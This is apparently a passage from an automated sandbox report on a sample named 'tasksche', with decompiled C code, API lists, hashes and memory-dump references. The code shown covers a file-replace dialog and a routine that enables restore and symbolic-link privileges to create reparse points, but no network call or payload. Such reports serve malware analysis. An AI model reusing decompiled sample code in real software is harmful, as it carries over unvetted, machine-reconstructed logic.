                                                                                                • Part of subcall function 0041C8A8: __realloc_crt.LIBCMT ref: 0041C909
                                                                                                • Part of subcall function 0041C8A8: __realloc_crt.LIBCMT ref: 0041C91F
                                                                                                • Part of subcall function 0041C8A8: __encode_pointer.LIBCMT ref: 0041C931
                                                                                                • Part of subcall function 0041C8A8: __encode_pointer.LIBCMT ref: 0041C93F
                                                                                                • Part of subcall function 0041C8A8: __encode_pointer.LIBCMT ref: 0041C94A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 1316407801-0
                                                                                              • Opcode ID: b55de3884da01d1a9e97354b2d40eb13cce2566ab91c9d35cf75a163aba5e344
                                                                                              • Instruction ID: e58e71dbedfae0fd7c0196075773fdb904cc218e0a70426679e08a5f69f6d609
                                                                                              • Opcode Fuzzy Hash: b55de3884da01d1a9e97354b2d40eb13cce2566ab91c9d35cf75a163aba5e344
                                                                                              • Instruction Fuzzy Hash: 8ED05B71E41605EACB10BFE6DC427CD77706F44315F60416FB018550D2C67C45C14A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D513(void* __edx, intOrPtr _a20, intOrPtr _a28) {
                                                                                              				void* _t5;
                                                                                              
                                                                                              				SendDlgItemMessageW( *0x441844, 0x6a, 0x402, E0040D1DE(_a20, _a28), 0); // executed
                                                                                              				_t5 = E0040D116(); // executed
                                                                                              				return _t5;
                                                                                              			}




                                                                                              0x0040d530
                                                                                              0x0040d536
                                                                                              0x0040d53b

                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32 ref: 0040D530
                                                                                                • Part of subcall function 0040D116: PeekMessageW.USER32 ref: 0040D127
                                                                                                • Part of subcall function 0040D116: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040D138
                                                                                                • Part of subcall function 0040D116: TranslateMessage.USER32(?), ref: 0040D142
                                                                                                • Part of subcall function 0040D116: DispatchMessageW.USER32 ref: 0040D14C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 4142818094-0
                                                                                              • Opcode ID: 7040c51d5953534f53b945be8071fa726febfab1a70e776a765f2f75df90e843
                                                                                              • Instruction ID: 888b2871e718dea131dfcf0ec1cbc21fe8f041a13ed789b986bd41985b0bed4c
                                                                                              • Opcode Fuzzy Hash: 7040c51d5953534f53b945be8071fa726febfab1a70e776a765f2f75df90e843
                                                                                              • Instruction Fuzzy Hash: FDC01235240300ABE7117B50DD07F1A3A62BB88B09F808039BA81380F2CEB648369A0A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E00408C47(void* __ecx) {
                                                                                              				int _t2;
                                                                                              
                                                                                              				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~(_t2 - 1) + 1;
                                                                                              			}




                                                                                              0x00408c4a
                                                                                              0x00408c53
                                                                                              0x00408c56

                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,004080D7,?,?,?,?,?,?), ref: 00408C4A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: 372b206049e22359e890f019f69c17f88631756899d3b8a56b0e056d033f7bf1
                                                                                              • Instruction ID: 463f2a0b6f7528456a39aa395305c1415068e572747894341c9f749ccc5f34b3
                                                                                              • Opcode Fuzzy Hash: 372b206049e22359e890f019f69c17f88631756899d3b8a56b0e056d033f7bf1
                                                                                              • Instruction Fuzzy Hash: 80B012703E0006878E102B30CD084143910D71130630041B0600AC6061CB13C0135611
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E00419C88(WCHAR* _a4) {
                                                                                              				signed int _t2;
                                                                                              
                                                                                              				_t2 = SetCurrentDirectoryW(_a4); // executed
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~( ~_t2);
                                                                                              			}




                                                                                              0x00419c8c
                                                                                              0x00419c94
                                                                                              0x00419c98

                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0040D8E5,0042A65C,00000000,?,00000006,?,00000800), ref: 00419C8C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: 35c8f440b0c787f752f8f5ff34d68e699b4f54a7e8ae052c3817328c3539a25c
                                                                                              • Instruction ID: 2a7281b05ebb75ae791a00df68b116ffeccc810d55834c007acaed3bb23dd98c
                                                                                              • Opcode Fuzzy Hash: 35c8f440b0c787f752f8f5ff34d68e699b4f54a7e8ae052c3817328c3539a25c
                                                                                              • Instruction Fuzzy Hash: 50A012302940064F8A100B30CC0D82577506760702F0096307002C10A4CB304430A505
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E75F() {
                                                                                              				void* _t1;
                                                                                              
                                                                                              				_t1 = E0041E6ED(0); // executed
                                                                                              				return _t1;
                                                                                              			}




                                                                                              0x0041e761
                                                                                              0x0041e767

                                                                                              APIs
                                                                                              • __encode_pointer.LIBCMT ref: 0041E761
                                                                                                • Part of subcall function 0041E6ED: TlsGetValue.KERNEL32(00000000,?,0041E766,00000000,00425725,0044F9F8,00000000,00000314,?,0042190C,0044F9F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041E6FF
                                                                                                • Part of subcall function 0041E6ED: TlsGetValue.KERNEL32(00000005,?,0041E766,00000000,00425725,0044F9F8,00000000,00000314,?,0042190C,0044F9F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041E716
                                                                                                • Part of subcall function 0041E6ED: RtlEncodePointer.NTDLL(00000000,?,0041E766,00000000,00425725,0044F9F8,00000000,00000314,?,0042190C,0044F9F8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041E754
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$EncodePointer__encode_pointer
                                                                                              • String ID:
                                                                                              • API String ID: 2585649348-0
                                                                                              • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                              • Instruction ID: 4883469bbd1ea34a64006740ed19a0f762d603c0c8182deb4ccf55bf016c8140
                                                                                              • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E0040DE5E(void* __ecx, void* __edx, void* __eflags) {
                                                                                              				void* _t71;
                                                                                              				void* _t86;
                                                                                              				int _t87;
                                                                                              				void* _t102;
                                                                                              				signed int _t130;
                                                                                              				void* _t139;
                                                                                              				void* _t150;
                                                                                              				struct HICON__* _t151;
                                                                                              				void* _t155;
                                                                                              				void* _t156;
                                                                                              				void* _t157;
                                                                                              				void* _t158;
                                                                                              				void* _t159;
                                                                                              				void* _t163;
                                                                                              				signed int _t167;
                                                                                              				void* _t169;
                                                                                              				struct HWND__* _t173;
                                                                                              				int _t179;
                                                                                              				void* _t181;
                                                                                              				void* _t183;
                                                                                              				void* _t185;
                                                                                              
                                                                                              				_t169 = __edx;
                                                                                              				_t181 = _t183 - 0x68;
                                                                                              				E0041AAF0(0x1a50);
                                                                                              				_t173 =  *(_t181 + 0x70);
                                                                                              				if(E004060EE(__edx, _t173,  *(_t181 + 0x74),  *(_t181 + 0x78),  *((intOrPtr*)(_t181 + 0x7c)), L"REPLACEFILEDLG", 0, 0) == 0) {
                                                                                              					_t71 =  *(_t181 + 0x74) - 0x110;
                                                                                              					if(_t71 == 0) {
                                                                                              						SetFocus(GetDlgItem(_t173, 0x6c));
                                                                                              						E00410B9C(_t181 - 0x19e8,  *((intOrPtr*)(_t181 + 0x7c)), 0x800);
                                                                                              						E0040A2B0(_t181 - 0x19e8, _t181 - 0x19e8, 0x800);
                                                                                              						SetDlgItemTextW(_t173, 0x65, _t181 - 0x19e8);
                                                                                              						SHGetFileInfoW(_t181 - 0x19e8, 0, _t181 - 0x9e8, 0x2b4, 0x100);
                                                                                              						SendDlgItemMessageW( *(_t181 + 0x70), 0x66, 0x170,  *(_t181 - 0x9e8), 0);
                                                                                              						_t86 = FindFirstFileW(_t181 - 0x19e8, _t181 - 0x334);
                                                                                              						 *(_t181 + 0x74) = _t86;
                                                                                              						if(_t86 != 0xffffffff) {
                                                                                              							FileTimeToLocalFileTime(_t181 - 0x320, _t181 + 0x60);
                                                                                              							FileTimeToSystemTime(_t181 + 0x60, _t181 + 0x50);
                                                                                              							GetTimeFormatW(0x400, 2, _t181 + 0x50, 0, _t181 - 0x80, 0x32);
                                                                                              							GetDateFormatW(0x400, 0, _t181 + 0x50, 0, _t181 - 0x1c, 0x32);
                                                                                              							_push(_t181 - 0x80);
                                                                                              							_push(_t181 - 0x1c);
                                                                                              							_t102 = E0040C3BF(0x99);
                                                                                              							_t163 = 0x200;
                                                                                              							E0040BC16(_t181 - 0x734, 0x200, L"%s %s %s", _t102);
                                                                                              							_t185 = _t183 + 0x18;
                                                                                              							SetDlgItemTextW( *(_t181 + 0x70), 0x6a, _t181 - 0x734);
                                                                                              							FindClose( *(_t181 + 0x74));
                                                                                              							if(( *(_t181 - 0x334) & 0x00000010) == 0) {
                                                                                              								_t139 = E0041ABD0( *((intOrPtr*)(_t181 - 0x318)), 0, 0, 1);
                                                                                              								asm("adc edx, ebx");
                                                                                              								E0040D155(_t139 +  *((intOrPtr*)(_t181 - 0x314)), _t169, _t181 - 0xe4, 0x32);
                                                                                              								_push(E0040C3BF(0x98));
                                                                                              								_t163 = 0x200;
                                                                                              								E0040BC16(_t181 - 0x734, 0x200, L"%s %s", _t181 - 0xe4);
                                                                                              								_t185 = _t185 + 0x14;
                                                                                              								SetDlgItemTextW( *(_t181 + 0x70), 0x68, _t181 - 0x734);
                                                                                              							}
                                                                                              							SendDlgItemMessageW( *(_t181 + 0x70), 0x67, 0x170,  *(_t181 - 0x9e8), 0);
                                                                                              							E00411346( *0x441824, _t181 + 0x48);
                                                                                              							FileTimeToLocalFileTime(_t181 + 0x48, _t181 + 0x60);
                                                                                              							FileTimeToSystemTime(_t181 + 0x60, _t181 + 0x50);
                                                                                              							GetTimeFormatW(0x400, 2, _t181 + 0x50, 0, _t181 - 0x80, 0x32);
                                                                                              							GetDateFormatW(0x400, 0, _t181 + 0x50, 0, _t181 - 0x1c, 0x32);
                                                                                              							_push(_t181 - 0x80);
                                                                                              							_push(_t181 - 0x1c);
                                                                                              							E0040BC16(_t181 - 0x734, _t163, L"%s %s %s", E0040C3BF(0x99));
                                                                                              							SetDlgItemTextW( *(_t181 + 0x70), 0x6b, _t181 - 0x734);
                                                                                              							_t130 =  *0x44182c;
                                                                                              							_t167 =  *0x441828;
                                                                                              							if(( *(_t181 - 0x334) & 0x00000010) == 0 || (_t167 | _t130) != 0) {
                                                                                              								E0040D155(_t167, _t130, _t181 - 0xe4, 0x32);
                                                                                              								_push(E0040C3BF(0x98));
                                                                                              								E0040BC16(_t181 - 0x734, _t163, L"%s %s", _t181 - 0xe4);
                                                                                              								SetDlgItemTextW( *(_t181 + 0x70), 0x69, _t181 - 0x734);
                                                                                              							}
                                                                                              						}
                                                                                              						L26:
                                                                                              						_t87 = 0;
                                                                                              						L27:
                                                                                              						goto L28;
                                                                                              					}
                                                                                              					if(_t71 != 1) {
                                                                                              						goto L26;
                                                                                              					}
                                                                                              					_t179 = 2;
                                                                                              					_t150 = ( *(_t181 + 0x78) & 0x0000ffff) - _t179;
                                                                                              					if(_t150 == 0) {
                                                                                              						L11:
                                                                                              						_push(6);
                                                                                              						L12:
                                                                                              						_pop(_t179);
                                                                                              						L13:
                                                                                              						_t151 = SendDlgItemMessageW(_t173, 0x66, 0x171, 0, 0);
                                                                                              						if(_t151 != 0) {
                                                                                              							DestroyIcon(_t151);
                                                                                              						}
                                                                                              						EndDialog(_t173, _t179);
                                                                                              						_t87 = 1;
                                                                                              						goto L27;
                                                                                              					}
                                                                                              					_t155 = _t150 - 0x6a;
                                                                                              					if(_t155 == 0) {
                                                                                              						_t179 = 0;
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					_t156 = _t155 - 1;
                                                                                              					if(_t156 == 0) {
                                                                                              						_t179 = 1;
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					_t157 = _t156 - 1;
                                                                                              					if(_t157 == 0) {
                                                                                              						_push(4);
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					_t158 = _t157 - 1;
                                                                                              					if(_t158 == 0) {
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					_t159 = _t158 - 1;
                                                                                              					if(_t159 == 0) {
                                                                                              						_push(3);
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					if(_t159 != 1) {
                                                                                              						goto L26;
                                                                                              					}
                                                                                              					goto L11;
                                                                                              				} else {
                                                                                              					_t87 = 1;
                                                                                              					L28:
                                                                                              					return _t87;
                                                                                              				}
                                                                                              			}
























                                                                                              0x0040de5e
                                                                                              0x0040de5f
                                                                                              0x0040de68
                                                                                              0x0040de6f
                                                                                              0x0040de8c
                                                                                              0x0040de99
                                                                                              0x0040de9f
                                                                                              0x0040df14
                                                                                              0x0040df2a
                                                                                              0x0040df38
                                                                                              0x0040df4d
                                                                                              0x0040df68
                                                                                              0x0040df7f
                                                                                              0x0040df93
                                                                                              0x0040df99
                                                                                              0x0040df9f
                                                                                              0x0040dfb0
                                                                                              0x0040dfbe
                                                                                              0x0040dfd7
                                                                                              0x0040dfea
                                                                                              0x0040dff3
                                                                                              0x0040dff7
                                                                                              0x0040dffd
                                                                                              0x0040e008
                                                                                              0x0040e015
                                                                                              0x0040e01a
                                                                                              0x0040e029
                                                                                              0x0040e02e
                                                                                              0x0040e03b
                                                                                              0x0040e052
                                                                                              0x0040e061
                                                                                              0x0040e065
                                                                                              0x0040e074
                                                                                              0x0040e081
                                                                                              0x0040e08e
                                                                                              0x0040e093
                                                                                              0x0040e0a2
                                                                                              0x0040e0a2
                                                                                              0x0040e0b6
                                                                                              0x0040e0c6
                                                                                              0x0040e0d3
                                                                                              0x0040e0e1
                                                                                              0x0040e0f6
                                                                                              0x0040e10b
                                                                                              0x0040e114
                                                                                              0x0040e118
                                                                                              0x0040e131
                                                                                              0x0040e145
                                                                                              0x0040e14e
                                                                                              0x0040e153
                                                                                              0x0040e159
                                                                                              0x0040e16c
                                                                                              0x0040e17b
                                                                                              0x0040e190
                                                                                              0x0040e1a4
                                                                                              0x0040e1a4
                                                                                              0x0040e159
                                                                                              0x0040e1a6
                                                                                              0x0040e1a6
                                                                                              0x0040e1a8
                                                                                              0x00000000
                                                                                              0x0040e1a8
                                                                                              0x0040dea2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040deae
                                                                                              0x0040deaf
                                                                                              0x0040deb1
                                                                                              0x0040decb
                                                                                              0x0040decb
                                                                                              0x0040decd
                                                                                              0x0040decd
                                                                                              0x0040dece
                                                                                              0x0040ded8
                                                                                              0x0040dee0
                                                                                              0x0040dee3
                                                                                              0x0040dee3
                                                                                              0x0040deeb
                                                                                              0x0040def3
                                                                                              0x00000000
                                                                                              0x0040def3
                                                                                              0x0040deb3
                                                                                              0x0040deb6
                                                                                              0x0040df06
                                                                                              0x00000000
                                                                                              0x0040df06
                                                                                              0x0040deb8
                                                                                              0x0040deb9
                                                                                              0x0040df03
                                                                                              0x00000000
                                                                                              0x0040df03
                                                                                              0x0040debb
                                                                                              0x0040debc
                                                                                              0x0040defd
                                                                                              0x00000000
                                                                                              0x0040defd
                                                                                              0x0040debe
                                                                                              0x0040debf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040dec1
                                                                                              0x0040dec2
                                                                                              0x0040def9
                                                                                              0x00000000
                                                                                              0x0040def9
                                                                                              0x0040dec5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040de8e
                                                                                              0x0040de90
                                                                                              0x0040e1ab
                                                                                              0x0040e1af
                                                                                              0x0040e1af

                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32 ref: 0040DED8
                                                                                              • DestroyIcon.USER32(00000000), ref: 0040DEE3
                                                                                              • EndDialog.USER32(?,00000006), ref: 0040DEEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyDialogIconItemMessageSend
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 3309745630-1840816070
                                                                                              • Opcode ID: 16eeae55bdc9405558cec747ebfcc07caac1c70e605718ffa483f40035c658e6
                                                                                              • Instruction ID: 1ca02d43f13477766b0e0b2ecc80fe6690186a1d560daa565d76ee57e1f32e2a
                                                                                              • Opcode Fuzzy Hash: 16eeae55bdc9405558cec747ebfcc07caac1c70e605718ffa483f40035c658e6
                                                                                              • Instruction Fuzzy Hash: 56A18272A4021CABEB21DFE0CC85FEF776DEB04704F440476BA05E60D1D6789E5A8B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E0040690A() {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t112;
                                                                                              				intOrPtr _t113;
                                                                                              				long _t120;
                                                                                              				intOrPtr _t122;
                                                                                              				signed int _t123;
                                                                                              				int _t144;
                                                                                              				long _t163;
                                                                                              				signed int _t168;
                                                                                              				void* _t178;
                                                                                              				void* _t180;
                                                                                              				void* _t184;
                                                                                              				short _t185;
                                                                                              				void* _t191;
                                                                                              				intOrPtr _t193;
                                                                                              				long _t194;
                                                                                              				short _t196;
                                                                                              				signed int _t222;
                                                                                              				void* _t227;
                                                                                              				void* _t229;
                                                                                              				void* _t230;
                                                                                              				void* _t242;
                                                                                              
                                                                                              				E0041A4DC(E00429638, _t227);
                                                                                              				E0041AAF0(0x303c);
                                                                                              				if( *0x4335a3 == 0) {
                                                                                              					E00406553(L"SeRestorePrivilege");
                                                                                              					E00406553(L"SeCreateSymbolicLinkPrivilege");
                                                                                              					 *0x4335a3 = 1;
                                                                                              				}
                                                                                              				_t198 = _t227 - 0x20;
                                                                                              				E00406760(_t227 - 0x20, 0x1418);
                                                                                              				_t222 =  *(_t227 + 0x10);
                                                                                              				 *(_t227 - 4) =  *(_t227 - 4) & 0x00000000;
                                                                                              				_t5 = _t222 + 0x10f4; // 0x10f4
                                                                                              				E00410B9C(_t227 - 0x1024, _t5, 0x800);
                                                                                              				 *(_t227 + 0x10) = E0041A7AF(_t227 - 0x1024);
                                                                                              				_t225 = _t227 - 0x1024;
                                                                                              				 *((intOrPtr*)(_t227 - 0x10)) = _t227 - 0x2024;
                                                                                              				_t112 = E0041C81C(_t227 - 0x1024, L"\\??\\", 4);
                                                                                              				_t230 = _t229 + 0x10;
                                                                                              				asm("sbb bl, bl");
                                                                                              				_t191 =  ~_t112 + 1;
                                                                                              				if(_t191 == 0) {
                                                                                              					L5:
                                                                                              					_t113 =  *((intOrPtr*)(_t227 - 0x10));
                                                                                              					goto L6;
                                                                                              				} else {
                                                                                              					_t225 = _t227 - 0x101c;
                                                                                              					_t184 = E0041C81C(_t227 - 0x101c, L"UNC\\", 4);
                                                                                              					_t230 = _t230 + 0xc;
                                                                                              					if(_t184 != 0) {
                                                                                              						goto L5;
                                                                                              					}
                                                                                              					_t185 = 0x5c;
                                                                                              					 *((short*)(_t227 - 0x2024)) = _t185;
                                                                                              					_t113 = _t227 - 0x2022;
                                                                                              					_t225 = _t227 - 0x1016;
                                                                                              					L6:
                                                                                              					E0041A7F7(_t113, _t225);
                                                                                              					 *((intOrPtr*)(_t227 - 0x10)) = E0041A7AF(_t227 - 0x2024);
                                                                                              					if( *((char*)( *((intOrPtr*)(_t227 + 8)) + 0x518b)) != 0) {
                                                                                              						L16:
                                                                                              						E0040935F(_t191, _t198, _t222,  *(_t227 + 0xc), 1);
                                                                                              						__eflags =  *((char*)(_t222 + 0x10e1));
                                                                                              						if( *((char*)(_t222 + 0x10e1)) != 0) {
                                                                                              							L21:
                                                                                              							__eflags = CreateDirectoryW( *(_t227 + 0xc), 0);
                                                                                              							if(__eflags == 0) {
                                                                                              								L10:
                                                                                              								_t242 =  *(_t227 - 0x20);
                                                                                              								L11:
                                                                                              								if(_t242 == 0) {
                                                                                              									L14:
                                                                                              									_t120 = 0;
                                                                                              									L15:
                                                                                              									 *[fs:0x0] =  *((intOrPtr*)(_t227 - 0xc));
                                                                                              									return _t120;
                                                                                              								}
                                                                                              								_push( *(_t227 - 0x20));
                                                                                              								L13:
                                                                                              								E0041A506(_t191, _t222, _t225, _t242);
                                                                                              								goto L14;
                                                                                              							}
                                                                                              							_t225 = 0;
                                                                                              							__eflags = 0;
                                                                                              							L23:
                                                                                              							_t122 =  *((intOrPtr*)(_t222 + 0x10f0));
                                                                                              							__eflags = _t122 - 3;
                                                                                              							if(_t122 != 3) {
                                                                                              								__eflags = _t122 - 2;
                                                                                              								if(_t122 == 2) {
                                                                                              									L27:
                                                                                              									_t225 =  *(_t227 - 0x20);
                                                                                              									_t123 =  *(_t227 + 0x10);
                                                                                              									 *((short*)(_t225 + 0xa)) = _t123 + _t123;
                                                                                              									 *(_t225 + 4) =  *((intOrPtr*)(_t227 - 0x10)) + _t123 +  *((intOrPtr*)(_t227 - 0x10)) + _t123 + 0x10;
                                                                                              									 *_t225 = 0xa000000c;
                                                                                              									 *((short*)(_t225 + 6)) = 0;
                                                                                              									 *((short*)(_t225 + 8)) = 0;
                                                                                              									E0041A7F7(_t225 + 0x14, _t227 - 0x1024);
                                                                                              									 *((short*)(_t225 + 0xc)) =  *(_t227 + 0x10) +  *(_t227 + 0x10) + 2;
                                                                                              									 *((short*)(_t225 + 0xe)) =  *((intOrPtr*)(_t227 - 0x10)) +  *((intOrPtr*)(_t227 - 0x10));
                                                                                              									E0041A7F7(_t225 + 0x16 +  *(_t227 + 0x10) * 2, _t227 - 0x2024);
                                                                                              									__eflags = _t191;
                                                                                              									_t74 = _t191 == 0;
                                                                                              									__eflags = _t74;
                                                                                              									 *(_t225 + 0x10) = 0 | _t74;
                                                                                              									L28:
                                                                                              									_t191 = CreateFileW( *(_t227 + 0xc), 0xc0000000, 0, 0, 3, 0x2200000, 0);
                                                                                              									__eflags = _t191 - 0xffffffff;
                                                                                              									if(__eflags != 0) {
                                                                                              										_t144 = DeviceIoControl(_t191, 0x900a4, _t225, ( *(_t225 + 4) & 0x0000ffff) + 8, 0, 0, _t227 - 0x24, 0);
                                                                                              										__eflags = _t144;
                                                                                              										if(_t144 != 0) {
                                                                                              											E00408786(_t227 - 0x3048);
                                                                                              											 *(_t227 - 4) = 1;
                                                                                              											E00408A32(_t227 - 0x3048);
                                                                                              											 *(_t227 - 0x3044) = _t191;
                                                                                              											_t193 =  *((intOrPtr*)(_t227 + 8));
                                                                                              											asm("sbb eax, eax");
                                                                                              											_t88 = _t222 + 0x1040; // 0x1040
                                                                                              											asm("sbb eax, eax");
                                                                                              											_t90 = _t222 + 0x1038; // 0x1038
                                                                                              											_t92 = _t222 + 0x1030; // 0x1030
                                                                                              											asm("sbb eax, eax");
                                                                                              											E00408D35(_t227 - 0x3048,  ~( *(_t193 + 0x628c)) & _t92,  ~( *(_t193 + 0x6290)) & _t90,  ~( *(_t193 + 0x6294)) & _t88);
                                                                                              											E00408A32(_t227 - 0x3048);
                                                                                              											__eflags =  *((char*)(_t193 + 0x519b));
                                                                                              											if( *((char*)(_t193 + 0x519b)) == 0) {
                                                                                              												E0040908D( *(_t227 + 0xc),  *((intOrPtr*)(_t222 + 0x1c)));
                                                                                              											}
                                                                                              											 *(_t227 - 4) = 0;
